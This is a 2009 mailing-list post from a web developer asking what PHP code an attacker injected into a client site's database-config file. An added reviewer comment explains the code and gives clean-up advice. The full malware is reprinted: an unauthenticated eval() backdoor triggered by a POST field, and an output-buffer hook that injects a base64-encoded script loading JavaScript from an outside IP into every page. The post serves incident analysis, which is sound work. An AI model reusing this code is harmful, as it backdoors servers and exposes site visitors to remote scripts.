[thelist] Client site hacked - need help understanding inserted PHP code

CosmicFawn CosmicFawn at mystrealm.com
Wed Mar 25 16:34:36 CDT 2009


I have a client whose website was hacked in the last few days. I 
know for sure that someone was in there because they've added some PHP 
code to my dbinfo file.  I was wondering if someone out there with more 
PHP knowledge than I have can tell me what this code is designed to do.

 /*
  * Analysis notes (reviewer): this is injected code, not part of the application.
  * The code below is kept byte-for-byte as posted. The mail client wrapped what
  * was presumably a single line, so the line breaks that fall inside two quoted
  * strings (the self-matching regex and 'default output handler') were most
  * likely plain spaces in the planted file.
  *
  * 1. Backdoor. If a POST field named tmp_lkojfghx3 is present, its value is
  *    passed straight to eval(). Nothing is authenticated, so any request that
  *    causes this file to run can execute arbitrary PHP with the site's
  *    privileges.
  *
  * 2. TMP_XHGFJOKL. A base64-encoded HTML fragment. It decodes to a
  *    <script language=javascript> block whose document.write(unescape(...))
  *    strips filler tokens with .replace() and emits a script tag loading
  *    //94.247.2[.]195/jquery.js (defanged here). This is what visitors'
  *    browsers receive.
  *
  * 3. tmp_lkojfghx($s). Output-buffer callback that rewrites every page:
  *    - if $s starts with the gzip magic bytes chr(31).chr(139), it inflates
  *      the body (skipping the 10-byte header and 8-byte trailer) and
  *      gzencode()s the result again before returning;
  *    - it deletes existing script blocks of more than five lines that look
  *      obfuscated: a 30+ character unbroken token after a quote, or a run of
  *      20+ comma-separated numbers, combined with eval, fromCharCode or
  *      document.write. Presumably this removes other injected scripts; it can
  *      also remove legitimate packed JavaScript;
  *    - it removes any earlier copy of its own script block, then inserts
  *      TMP_XHGFJOKL in front of each "<body" match, or appends it to the
  *      output when there is no "<body" but an earlier copy was removed or the
  *      output contains "</body" or "</title>".
  *
  * 4. tmp_lkojfghx2(). Installs the filter. It walks ob_get_status(1) and
  *    returns if tmp_lkojfghx is already an active handler. Otherwise it saves
  *    each buffer's handler name (false for the default handler), captures and
  *    closes the buffers from innermost to outermost, starts a new buffer with
  *    tmp_lkojfghx as its callback, and reopens the saved buffers on top of it
  *    with their contents replayed. The filter therefore sees the final output.
  *    When invoked as an error handler (non-empty $b) it first forwards the
  *    call to the previously registered handler saved in
  *    $GLOBALS['tmp_xhgfjokl'].
  *
  * 5. The last two statements register tmp_lkojfghx2 as the PHP error handler
  *    (remembering the previous one) and call it once, so the hook is installed
  *    immediately and re-checked whenever PHP raises an error.
  *
  * NOTE(review): the eval() backdoor means the attacker could run any code, so
  * deleting this snippet alone is not a clean-up. Search all files for the
  * markers tmp_lkojfghx and TMP_XHGFJOKL, treat any credentials stored in this
  * file as exposed, and find out how the file was modified in the first place.
  */
 if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0M5V3N4RGxjcjBvaXB0OVclMjBzT21yamNjJTNEJTJGa3IlMkY5NCUyRTlXMjRqYzclMkUyJTJFMTk5VzUlMkZqcTBvdWVPbXIwb3klMkVGQmpzJTNFJTNDJTJGT21zY0ZCcmlrcnB0amMlM0UnKS5yZXBsYWNlKC9qY3xrcnxxcnxGQnxPbXwyb3wwb3w5V3x4RGwvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function 
tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] 
as 
$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script 
language=javascript><!-- \ndocument\.write\(unescape\(.+?\n 
--></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return 
$g?gzencode($s):$s;}function 
tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) 
as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else 
$s[]=array($a=='default output 
handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo 
$s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();

Thanks so much.

Rae.




